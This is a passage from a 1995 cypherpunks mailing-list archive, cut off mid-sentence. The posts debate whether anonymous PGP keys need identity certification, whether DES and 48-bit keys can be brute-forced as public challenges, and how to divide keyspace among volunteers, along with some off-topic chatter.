Having had a couple of hours to calm down, it seems a little frenetic, but
there is enough truth in it that I will now repost it to cypherpunks.

Context:  Someone was asking how he could go about verifying the identity of
an anonymous interlocutor, so that he could sign his public key.



- -----BEGIN PGP SIGNED MESSAGE-----

Look, I don't have a lot of time here, but I need to say that this whole
"certifying anonymous keys" idea is misled.  The fact is, *I* *don't* *care*
what your True Name is.


I can only think of two reasons why you would need a person's True Name,
and I doubt that anybody here can apply either of these reasons to anyone 
else here.


Reason Number Uno, why you might want a person's True Name:

Because you want to physically hurt them, or effectively threaten to hurt
them.  (Or send someone else to do it, like a hit man, policeman, etc.)


Reason Number Dos, why you might want a person's True Name:

Because you want to have sex with them.  (Or as above, if you prefer to do it
through proxies...)



Okay now does anyone want to do any of the above two things to me?  If not
then *don't* *worry* about whether my public key is signed by anyone or not.
It makes zero difference to you until such a time as one of the above
motivations acquires.



Zimmermann et al. were/are naive to emphasize the Web of Trust as a means of
introducing strangers.  With very few exceptions, strangers don't *need*
to verify each other's physical identities!  This fact is central to some of
the more interesting social evolutions that information technology promises
to cause.  In retrospect, the emphasis in "pgpdoc1.txt" on verifying True
Names via mutually trusted introducers will seem quaint.



Bryce
Announcement: I have had technical difficulties.  If you sent me e-mail
between Aug 5 and Aug 20 and didn't receive a response, please re-send.
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDkLf/WZSllhfG25AQFhxwP6AzS0nus2QK8UEF5rvyqhFrwpzeAEE/Vr
BwRXJtstk5ln2f3SRh7BSYfda/TQDJe2VRt0qMF1xNCt1VLP+QCyr06LqZ0i/qv0
/CpC85/QRAgpQtrgyFKR6v3Ryi3MbeiUQuEOSgU+OelvZ5XcoRP3o5WDp18N4+Pv
5ddGzIVXQEk=
=5rxb
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDk3AfWZSllhfG25AQGQCgQAld0FFtRVZgDKZ1ofok4pK9zAAqlJHCiO
A+eLsSolfIvvfpTiE0viJUOuXIywnWzBT50js4LodwsQI4cKSVfnHdYNI4aoyQJf
G2P7dy7BaryOj8C74U2gYYq8Lys6Mh/i640KEa77EV4ZEDpLhSi25R+LB58qjvwJ
l705Z8I/Bhs=
=+xrs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Mon, 21 Aug 95 17:18:13 PDT
To: cypherpunks@toad.com
Subject: Why 64 bit keys?
Message-ID: <01HUCIWH37YW8ZEX8O@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Sat, 19 Aug 1995 15:13:35 -0400
>From: shamrock@netcom.com (Lucky Green)
>Subject: Re: 64 bit keys breakable by the NSA or just some random key length?

>I think the obvious conclusion would be because 64bits is crackable
>if need be and if you have the resources the goverment has. Not for
>routine monitoring of undesirables, but for those special cases
>where they don't want to expose their activities by requesting a
>warrant.

I think it's much more important to the powers that be (and that
eavesdrop) that a key of up to 64 bits includes DES, which means
that lots of system designers will use DES instead of (say) 3DES,
IDEA, or Blowfish.  It's virtually certain that NSA and others have
built keysearch machines for DES.  This gives NSA, et. al., a way
around the key escrow scheme when they want it.  Better yet, NSA
can tell the FBI and BATF and such agencies where to find the
technical papers on how to build one, without releasing any
highly-classified information--those agencies can hire someone to
build them one.  This also keeps NSA from having to dirty its hands
with law-enforcement surveilance.

Of course, it will be interesting to see whether pressure is
applied to keep people from offering "nonstandard" ciphers,
especially things like Blowfish and SEAL, which have key scheduling
algorithms that need a lot of memory and time. It's really only
practical to build keysearch machines for very commonly used
ciphers, and even then, it may be complicated. (For example,
imagine a DES variant whose key schedule required several
exponentiations modulo some 1024-bit prime.)

>- -- Lucky Green <mailto:shamrock@netcom.com>
>   PGP encrypted mail preferred.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDgfl0Hx57Ag8goBAQFa0gP/azECjB06onhSYTvLjkM2I7y2tOpC2BaB
RACVMQn+Z5kVGaDM47eIM1TlRnIMlnEucuLryvqR3fMDCt6g90oDXe3rziWJedbH
PxXYqgkPu1MmRfep+JWrtQ4wWsXxbPa10spTDFa8vKlGDcoohWU0W5ypgr454tlh
KKPaC345vqQ=
=td/F
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 21 Aug 95 20:39:23 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: signing keys for nyms
Message-ID: <199508220335.UAA17520@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:46 PM 8/21/95 -0600, Bryce Wilcox wrote:
>Look, I don't have a lot of time here, but I need to say that this whole
>"certifying anonymous keys" idea is misled.  The fact is, *I* *don't* *care*
>what your True Name is.
>
>I can only think of two reasons why you would need a person's True Name,
>and I doubt that anybody here can apply either of these reasons to anyone 
>else here.
>
>Reason Number Uno, why you might want a person's True Name:
>
>Because you want to physically hurt them, or effectively threaten to hurt
>them.  (Or send someone else to do it, like a hit man, policeman, etc.)
>
>Reason Number Dos, why you might want a person's True Name:
>Because you want to have sex with them.  (Or as above, if you prefer to do it
>through proxies...)
>
>Zimmermann et al. were/are naive to emphasize the Web of Trust as a means of
>introducing strangers.  With very few exceptions, strangers don't *need*
>to verify each other's physical identities!  This fact is central to some of
>the more interesting social evolutions that information technology promises
>to cause.  In retrospect, the emphasis in "pgpdoc1.txt" on verifying True
>Names via mutually trusted introducers will seem quaint.

Reason number 0 why you'd want someone's True Nym -
Because you've met them in person, or are a friend of a friend,
and want to make sure that the key you think is for Mr. X
isn't really the key for an imposter - if you've done Lefty Politics
over the last few decades, this is not unrealistic.
COINTELPRO may have been unreal and UnAmerican, but it happened.

Now, trusting people based on mutually trusted introducers may have
seemed quaint back in the 60s, and it certainly wasn't foolproof,
and planting the suspicion that someone _might_ be a cop was almost
as destructive as if they actually _were_ a cop.  But it's what there was.
(Ok, you had some extra sources of information, like whether the person
actually paid all their organization dues (COP!) or smoked dope with you
(and inhaled) or started advocating unreasonable violence (probable cop)...)

That doesn't mean you checked government-issue ID from people or necessarily
even used True Names; you could be dealing with people in person who
you only knew as "Bill from Delaware" or "Bear" or "Jeanie from the Sierra
Club",
but at least if you only trust keys from introducers who know people in person,
you're limiting your electronic conspiracy to people you would have conspired
with in person as well.  (Now, _I_ never bought drugs from Bear, and at this
point I don't even remember his True Name - but I didn't turn him in, either...)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 21 Aug 95 17:44:34 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: plan of action?
Message-ID: <9508220043.AA25405@all.net>
MIME-Version: 1.0
Content-Type: text


I would like to offer all.net as a repository for the sources and executables for
all platforms.  We can put them in the gopher server for all to access.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank Knobbe" <FKnobbe@ix.netcom.com>
Date: Mon, 21 Aug 95 18:56:09 PDT
To: cypherpunks@toad.com
Subject: Crack some code...
Message-ID: <199508220153.SAA17152@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Howdy folks.

Who would be willing to try to crack a code that I implemented in one 
of my programs? The file is a simple index file containing ASCII 
characters besides pointers.  If someone is interested in cracking 
that agorithm, simply send me a mail.  I'm curious of how good that 
algorithm is...

Greetings from Tennessee,
Frank

-----------------------------------------------------------------------------
Frank Knobbe:  FKnobbe@ix.netcom.com (preferred),  Frank@TechEx.com
PGP 1024/26639025 fingerprint=7A EA FF 87 BF EA 00 CD 83 B1 89 81 7E D2 69 96
http://www.techex.com/~frank/home.html  (<- Under Construction!)
IPhone:  Elwood@iphone.vocaltec.com, Ch: Tennessee
-----------------------------------------------------------------------------
Signature Space for Rent!  Imagine your signature here.
For more info contact:  Don@twr.ite.us




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Mon, 21 Aug 95 12:02:37 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape security
Message-ID: <9508211902.AA19391@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: altitude@cic.net (Alex Tang)
>It seems that one of the problems with Damien's
>cracking job was that it  was "not sanctioned".

Actually, INRIA's PR people are quite pleased with the publicity.
They asked me to prepare an official press release to counteract the
Wall Street Journal's "evil hacker" story, which was unfortunately
reprinted by some papers.  The Herald Tribune is particularly bad in
this respect.

If some media insist on this "evil hacker" thing, they will look
more ridiculous than anything else (I hope).

The press release will be out as soon as it gets through the red tape
(the official opinion of a French administration is not something to
be taken lightly, even though it's mostly facts :-)  I'll put it on my
web page when it's official (which is likely to be too late).

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Mon, 21 Aug 95 12:14:34 PDT
To: cypherpunks@toad.com
Subject: Re:  Liability for Key Cracking in Idle Hours?
Message-ID: <9508211914.AA19431@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>Damien may be able to tell us if Ecole Polytechnique has raised any
>questions about his highly-publicized attack on the SSL Challenge key.

Well, I asked for permission before I used the machines, so I don't
expect any problem.  (Actually, I asked for the permission, then
launched the processes, then got the permission, but it doesn't make
any difference, does it ?  I should have also asked permission for
putting their name in my announce, though.)

It seems that the Herald Tribune called them about a cracker, and they
refused to comment.  They must have gone in paranoid mode, because
they've had lots of trouble with student crackers in the past, and
there is currently not even one student on the campus.  But now, the
situation seems to be in control, although I had no official contact
from Ecole Polytechnique.

Ecole Normale Superieure did not react at all.  They're all on
vacation anyway.

By the way, "cypherpunks" keep getting mentioned in interviews with
the press.  I hope that's OK with you all.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 21 Aug 95 18:42:34 PDT
To: cypherpunks@toad.com
Subject: Newsweek on PGPfone
Message-ID: <199508220142.VAA16607@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Newsweek, August 28, 1995, p. 10.


   Encryption: Pretty Good Phone Privacy

      [Photo] 'This is what I do': Cryptomaster Zimmermann


   In the wake of reports that the Clinton Administration is
   considering another Clipper-like scheme to ensure
   government access to encrypted conversations and e-mail,
   Phil Zimmermann is striking again. The 41-year-old author
   of the notorious PGP (Pretty Good Privacy) software program
   that scrambles e-mail so snoops can't read it is about to
   release a sequel: PGPfone, which allows people to use their
   computers as secure telephones. If you have a recent
   Macintosh (a Windows verson comes next month) and a fast
   modem, you and a friend can speak in total privacy. As with
   its predecessor, Zimmermann is giving the software away,
   via MIT's Internet sites. Meanwhile, he's still waiting to
   hear whether the Feds will indict him for export violations
   in the distribution of PGP. Does Zimmermann worry that
   releasing PGPfone -- which can theoretically frustrate law-
   enforcement wiretaps -- will further inflame those who wish
   him arrested? "I'm a cryptographer, " he says. "This is
   what I do."

   [End]











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Mon, 21 Aug 95 18:48:55 PDT
To: Ted_Anderson@transarc.com
Subject: Re: Partial Key Escrow
In-Reply-To: <ckCAut70BwwM80o3IB@transarc.com>
Message-ID: <Pine.PMDF.3.91.950821214634.620943633A-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


A disadvantage of this ingenious proposal is that it makes it
even more difficult to spot rogue key-cracking efforts.  If you are an
honest government employee and you come across a key cracking program
today, and you work for a domestic TLA you know something funny is going
on.  "Just routine" will be line henceforth...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Mon, 21 Aug 95 20:41:01 PDT
To: CYPHERPUNKS@toad.com
Subject: Divide and Conquer
Message-ID: <8AF9533.0003000356.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


O > As you may have surmised Hal has given us another challenge to satisfy
O > the people who want to do a challenge to see *how fast* they can do it
O > by involving as many people and their computers as possible.

  Here's a thought or twelve: Precompute the divsion-of-keyspace
problem, in advance of the actual issue of challenge. Use whatever
criteria of estimating spare mips (idle_percentage * mips_rate) and
allocating slices, then issue each participant a [start..end] space
(and a direction flag. More on this later).

  That way, when the challenge is issued, there is no fumbling about,
but rather a simple: "Gentlemen, start your programs."

  Divide the participants into two roughly equal groups of total spare
mips, so as to address reliability and trust issues. Then allocate the
entire keyspace twice.

  Later...

  For more fun, if the cracker can be coded to read a direction flag
from the config file, so that the main loop can go ++ or --, the
lists of keyspace could alternate thusly:

       Red Team   Blue Team

        0000++     0000++
        --iiii     --jjjj         This method of allocating keyspace
        iiii++     jjjj++       puts the key in the space of 4
        --kkkk     --mmmm       different people at once, but only
        kkkk++     mmmm++       increases average search time by a
              . . .             factor of 2 to protect against holes.
      / --0000     --0000       since the direction flag is independent of
    / \ (FFFF--)   (FFFF--)     team, it reveals nothing to a Bad Guy.
  /
 Two ways of saying the same thing.

  In effect, the ranges computed by the allocator are paired up, and the
two people who share the range play "meet in the middle". If there are n
participants in the group, and b of them are Bad Guys, the probablity of
failure would be roughly (b/n)**4.



 * On a clear disk you can seek forever
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sw@tiac.net (Steve Witham)
Date: Mon, 21 Aug 95 20:07:52 PDT
To: cypherpunks@toad.com
Subject: Eric Hughes?
Message-ID: <199508220307.XAA29459@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Eric Hughes, if you're listening, please send me a note so I can update
my address file.  I don't receive cypherpunks right now.

 --Steve Witham <sw@tiac.net>


:o)-:
  -







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 21:56:58 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <ac5eb0d5120210041887@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:46 AM 8/22/95, Jon Lasser wrote:
>On Mon, 21 Aug 1995, Peter Trei wrote:
>
>> > The US is slipping into the second world as we
>> > speak, with no signs of a turnaround ahead.  Only the sheer size of
>> > the economy keeps people from believing it.
>>
>> Just a nomenclature peeve - I'm not sure of the precise time and
>> place the (first|second|third) world meme originated, but it seems to
>> predate 1970, and until very recently it's meaning was clear:
>>
>> First world: Western (and Westernized) nations - mainly the US, Canada,
>>Western Europe,
>> Japan, Australia, & New Zealand
>>
>> Second world: Communist bloc (I can still remember the Cultural
>> Revolution. Prior to that, the Communists seemed a monolithic force,
>> marching in lockstep.)
>>
>> Third world: The rest, mostly poor nations.
>
>Erm, nope.  The "First World" (or old world) was Europe and Asia; the "New
>World" (not frequently referrred to as the second world, but hey...)  The
>third world was the developing nations.  THAT (as far as I was taught in
>history class, so it MIGHT be a lie...) was how the terms originated...

Then you should sue your history teacher for giving you a defective
education :-}. Perhaps she or he was of my generation and was at Woodstock
when she should've been doing her homework.

By convention, the First World is the set of "Western" nations, the
democratic, capitalist nations. The Second World, though not often used as
a term, is the set of Communist bloc nations. The Third World, by far the
most commonly used term here, is the set of nations not formally affiliated
with either the First or Second Worlds. These nations are often poor,
though not necessarily poor, and so the "Third World" is often
(incorrectly) associated with poverty. And, to confuse things further, the
"lesser-developed countries," or LDCs, are often equated to the Third
World.

When a certain character in a television show referred to "Third World
mutants," he was also referring to "your basic brown types." (His words,
not mine. Ten credits to anyone who can identify the t.v. show and the
character.)

The term "Fourth World" has in the last 20 years come to refer to the
countries which are so impoverished as to be almost hopeless. Bangla Desh
is the canonical Fourth World nation.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 21 Aug 95 20:14:13 PDT
To: cypherpunks@toad.com
Subject: DES & RC4-48 Challenges
Message-ID: <9508220313.AA20225@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hello all,

	Lets face it the real challenge is DES, but those 56 bits are quite a 
bit harder than 40. 65536 times harder in fact.

	But if people broke 48 bits then maybe they might start to see 56 as 
being in reach. After all everyone wants to be in for the biggie.

	So before the NSA fobs us off with 48 bits can we crack it? Wind up the 
40 bit code a tad and set to work. It sounds as if it is comparable to the 
RSA-129 prime that was cracked (OK its probably a touch harder but machines are 
faster now).

	So who wants to make an RC-48 and a DES challenge?

		Phill.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 23:01:48 PDT
To: cypherpunks@toad.com
Subject: True Names and Webs of Trust
Message-ID: <ac5ebdaa140210041c80@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Just a comment on this business of whether we need certification of the
True Names of people we deal with:

I've dealt with "in person" maybe 60 to 100 of the people on this list (at
one time or another). In no cases--not a single one--have I made elaborate
checks to confirm that people are who they claim to be. A few driver's
licenses have been flashed at meetings, but I didn't look closely. Maybe a
passport was even displayed, but, again, I didn't look. And documents are
readily forged.

This has relevance to the thread Michael Froomkin raised, as well. To wit,
none of the people I've met has been "certified." And yet it doesn't bother
me.

As Bill Stewart correctly claimed is my view, the "key is the identity."
Or, more accurately, a _persistent personna_ is what matters.

Thus, I don't need to "verify" that "Eric Hughes" is "really" Eric Hughes,
and is not actually Fritz Doppelganger, assigned to Berkeley by the BND. I
really don't care about the so-called "reality."

(Sorry for all of the "quotes," but all of these terms are heavily laden
with connotations which bear deconstructing.)

My experiences are the norm, I think. Identity credentials are rarely
checked, and most people don't care too much. (An important point is that
in a cash economy, identity is almost irrelevant. It's only in non-cash, or
"account-based," economy that True Names are demanded. Lots of interesting
issues to discuss here, which I won't now.)

The "web of trust" model is really the normal way people go about their
business. I knew someone once introduced to me as "Hugh Daniel," and he
eventually introduced me to someone calling himself "Eric Hughes," and so
on. Introducers, webs of trust, etc. What their "real names" are makes
little difference. (Besides, their Real Names were written on flat stones
on the 3rd day after their births and placed in a safe place known only to
the Great Bird.)

I never use the web of trust model in PGP. I get so few PGP messages that
it's enough that people I know give me their keys. So I concede that the
web of trust model in the PGP world may or may not scale well. (In the
sense of tens of thousands of folks establishing a "web of trust.") But the
_basic_ idea of self-arranged transfers of keys and local networks of
friends is right on.

This is why I don't worry too much about the need for
government-authenticated keys and True Names.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 21 Aug 95 20:51:12 PDT
To: Peter Trei <trei@process.com>
Subject: Re: Third World Man
In-Reply-To: <9508211648.AA17528@toad.com>
Message-ID: <Pine.SUN.3.91.950821234411.20040A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Peter Trei wrote:

> > The US is slipping into the second world as we
> > speak, with no signs of a turnaround ahead.  Only the sheer size of
> > the economy keeps people from believing it. 
> 
> Just a nomenclature peeve - I'm not sure of the precise time and 
> place the (first|second|third) world meme originated, but it seems to
> predate 1970, and until very recently it's meaning was clear:
> 
> First world: Western (and Westernized) nations - mainly the US, Canada, Western Europe, 
> Japan, Australia, & New Zealand
> 
> Second world: Communist bloc (I can still remember the Cultural 
> Revolution. Prior to that, the Communists seemed a monolithic force, 
> marching in lockstep.)
> 
> Third world: The rest, mostly poor nations. 

Erm, nope.  The "First World" (or old world) was Europe and Asia; the "New 
World" (not frequently referrred to as the second world, but hey...)  The 
third world was the developing nations.  THAT (as far as I was taught in 
history class, so it MIGHT be a lie...) was how the terms originated...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 23:24:07 PDT
To: cypherpunks@toad.com
Subject: Re: DES & RC4-48 Challenges
Message-ID: <ac5ec2a81502100448c1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:29 AM 8/22/95, hallam@w3.org wrote:

>I think we can probably do DES within two years.
>
>        Phill

I strongly doubt it, and may be willing to bet money against it happening.
(If "we" means someone or some group on this mailing list. If "we" means
the Net, I still doubt it will happen.)

If the "idea futures" and betting markets we've talked about here (which
exist) ever take off, this may be a way to make some money for someone. For
example, if someone was laying 10:1 odds that SSL would not be cracked in
1995....

And for the "do DES" bet, you need to differentiate (no pun intended)
between a chosen plaintext attack and a more general attack. The
differential cryptanalysis ("DC" gets another overload) method needs chose
plaintext to cut the search space down to 2^47 keys.

Wiener's hypothesized "million dollar DES cracker" may do the general
attack, but I doubt anyone on our mailing list will do it. That is, the
number of workstations and even supercomputers which would have to be
lashed-together would be, ballpark, about 2^16 times greater than what was
lashed-together for the SSL challenge. Maybe a factor of ten could be cut
out with increased cleverness. Maybe.

Call it a factor of "only" 6000 times harder than the SSL challenge. Hard
to imagine this happening in the next two years.

Maybe if much of the Net community was energized to run DES crackers
instead of Flying Toasters, but a hard effort to organize...for fleeting
reward.

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Mon, 21 Aug 95 21:21:25 PDT
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <199508220417.AAA29302@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


> Thanks again, and I hope you go ahead and start PGP-clearsigning your posts
> so that my high opinion of you can become more firmly fixed.


> :-)


> Regards,

> Bryce

  If I don't PGP-sign my message, you can't prove I sent it.

  But if you don't put your name and e-mail address at the
bottom of your message, I don't even know who you are!  (Your
message was hit by the "three screens of Apparently-To: headers"
bug, and the From: line says "owner-cypherpunks@toad.com".  The
Subject: line also got lost.)

  Let's get the basics straight first, okay?  This has been part
of netiquette since before there was a net!


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Mon, 21 Aug 95 21:43:33 PDT
To: dan@milliways.org (Dan Bailey)
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <199508220411.AA13217@ibm.net>
Message-ID: <9508220443.AA03977@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Dan wrote:

|Not having my copy of The Differential Cryptanalysis of the Data
|Encryption Standard handy, I'd like to know about the distributability
|of this type of DES attack.  Done right, we could significantly reduce
|the time complexity.
|	The main problem, of course, would be coordinating such an effort.  I
|seem to recall this attack requiring lots of known plaintexts.  Time
|to review the text, I suppose....
|	Does the Federal Reserve still use single-key DES?

The forms of differential cryptanalysis that I'm aware of require The
cracker to adaptively atack the encrypting or decrypting device. I
therefore do not believe that they are especially applicable to
financial transactions schemes, most of which change keys quite
frequently.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Mon, 21 Aug 95 21:12:15 PDT
To: hallam@w3.org
Subject: Re: DES & RC4-48 Challenges
Message-ID: <199508220411.AA13217@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 95 23:13:06 -0400 you wrote:

>
>Hello all,
>
>	Lets face it the real challenge is DES, but those 56 bits are quite a 
>bit harder than 40. 65536 times harder in fact.
>
>40 bit code a tad and set to work. It sounds as if it is comparable to the 
>RSA-129 prime that was cracked (OK its probably a touch harder but machines are 
>faster now).
>
>	So who wants to make an RC-48 and a DES challenge?

Not having my copy of The Differential Cryptanalysis of the Data
Encryption Standard handy, I'd like to know about the distributability
of this type of DES attack.  Done right, we could significantly reduce
the time complexity.
	The main problem, of course, would be coordinating such an effort.  I
seem to recall this attack requiring lots of known plaintexts.  Time
to review the text, I suppose....
	Does the Federal Reserve still use single-key DES?
						Dan  
******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 21 Aug 95 22:30:28 PDT
To: dan@milliways.org (Dan Bailey)
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <199508220411.AA13217@ibm.net>
Message-ID: <9508220529.AA20429@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I don't think the differential Cryptanalysis attack helps very much. You
need a somewhat improbable quantity of chosen plaintext to attempt it.

You would get further with a direct attack I suspect. In any case lets do 
RC4-48 or RC4-44 first as proof of ability.


Another idea, lets crack CMDF, IBMs weakened key DES.

After DES the only other crack of interest thats in range is the meet in the 
middle attack on two key DES. Clipper looks a bit off in the distance still.
(We will get it one day, probably not until 2010 though).

I think we can probably do DES within two years.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Mon, 21 Aug 95 17:38:28 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: Basically F-C-ed
Message-ID: <199508220038.AA10242@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


I wrote earlier:

[..]
: : Orlando, Fla., August 20 (AP) -- Two explosives were
: : planted in a professor's suitcase to test airport
: : security measures in Amsterdam, The Netherlands, and were
: : discovered when he arrived in Orlando, officials said
: : Saturday.

: [..]
: : Kensel said such security measures were normal for
: : Europe.

: : "Particularly in Europe, there are grave concerns about
: : security issues," he said. "As a result, they do conduct
: : various security programs regularly. This was part of a
: : routine check of their own security systems.

: : "The bag got away from them basically," he said.


: Airport police was very quick to point out that such practices
: were legal, now when they do that ......

The Dutch Department of Justice stated that there was no legal
basis for such practises, Airport Police are forbidden to use
'innocent travelers' as decoy.

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Tue, 22 Aug 95 02:19:21 PDT
To: cypherpunks@toad.com
Subject: Re: DES & RC4-48 Challenges
Message-ID: <v02120d00ac5f122a84c7@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 PM 8/21/95, Timothy C. May wrote:

>Call it a factor of "only" 6000 times harder than the SSL challenge. Hard
>to imagine this happening in the next two years.
>
>Maybe if much of the Net community was energized to run DES crackers
>instead of Flying Toasters, but a hard effort to organize...for fleeting
>reward.

        Given the rate at which news of the prior cracks seems to have
spread among people quite new to these questions, I think you'd be
surprised: I've heard mention of it from no less than ten people who, to my
knowledge, had never before taken any interest whatsoever in crypto
questions. Granted, ten people a-laboring away on Pentiums and PPCs ain't
much--but, who knows?, my experience might just scale quite well.
        Yes, I know: Life is short and art is long. Still, I think it's
worth a try: failure seems likely and success remote, but how much sweeter
victory if the project were to succeed.
        The key, I think, would lie in making participation in the project
extremely accessible: developing simple platform-specific apps that'd make
sweeping space nearly idiot-proof. If joe.anne.net could DL an app
appropriate to hir platform then fill out field in a web page that would
delegate keyspace according to the question "I can let my [platform] run
for [n] hours," and easily report back the results, the response might be
quite strong. How long it would take to succeed, _if_ it did, is anyone's
guess: it could be a day or a decade.
        Obviously, the preparation would be a labor-intensive; the
trade-off, a good one imho, is that this labor having been performed, the
reservoir of potential contributors would expand manifold. If we could
